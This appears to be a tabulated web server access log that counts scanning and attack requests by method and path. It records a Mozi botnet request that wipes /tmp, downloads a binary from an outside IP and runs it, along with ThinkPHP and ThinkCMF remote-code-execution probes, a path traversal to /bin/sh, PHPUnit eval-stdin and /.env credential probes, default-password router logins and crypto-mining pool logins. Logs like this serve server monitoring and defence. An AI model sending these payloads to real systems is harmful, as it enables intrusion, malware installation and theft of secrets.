1 | {\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x67ac954cfca7cc130ec19e03946f27f5b2b019e9\",\"x\"],\"jsonrpc\":\"2.0\"} |
||
1 | {\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x6b434a79f3b22f89ba30f9d9db914d2feecf41c6\",\"x\"],\"jsonrpc\":\"2.0\"} |
||
2 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]} | |
2 | {\"id\": |
1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]} | |
1 | GET | ../../proc/ HTTP |
|
23 | GET | /.env |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /AjCwLauz69kIB1cMYFdynqXQ7vd |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
2 | GET | /HWi69nR2Ju_iduN3g_cVUQLEOCO3d031o2UIqyYZwAsrVo8gXo9MAQE08r0R1xysXgOB0oD18-94A1Ah0z60/ |
HTTP/1.1 |
2 | GET | /SiteLoader |
HTTP/1.1 |
2 | GET | /WuEL |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /a |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /blog/ |
HTTP/1.1 |
1 | GET | /blog/robots.txt |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /download/file.ext |
HTTP/1.1 |
2 | GET | /download/popy |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
2 | GET | /mPlayer |
HTTP/1.1 |
1 | GET | /nmaplowercheck1655188387 |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]253[.]13[.]235:51279/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wordpress/ |
HTTP/1.1 |
1 | GET | /wp/ |
HTTP/1.1 |
1 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
3 | HEAD | / |
HTTP/1.1 |
1 | HEAD | /robots.txt |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |